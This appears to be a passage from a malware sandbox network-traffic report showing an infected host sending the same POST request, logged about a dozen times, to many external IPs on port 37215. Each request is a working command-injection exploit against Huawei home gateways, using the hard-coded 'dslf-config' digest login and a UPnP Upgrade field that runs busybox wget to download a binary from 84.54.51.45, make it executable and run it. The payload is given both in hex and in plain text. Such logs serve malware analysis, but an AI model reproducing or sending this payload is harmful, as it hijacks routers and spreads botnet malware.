68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            728192.168.2.153503041.169.205.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162784100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            729192.168.2.154151641.175.149.937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162830114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            730192.168.2.154385441.66.94.3037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162833929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            731192.168.2.155566241.42.102.9837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162849903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            732192.168.2.155805641.59.26.21337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162859917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            733192.168.2.154001441.128.196.1237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162899017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            734192.168.2.155080241.146.28.11037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162900925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            735192.168.2.155261241.79.37.18937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162925959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            736192.168.2.153374441.207.153.11637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162955046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            737192.168.2.153896241.246.90.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.162955046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            738192.168.2.154901841.32.114.1337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.163176060 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
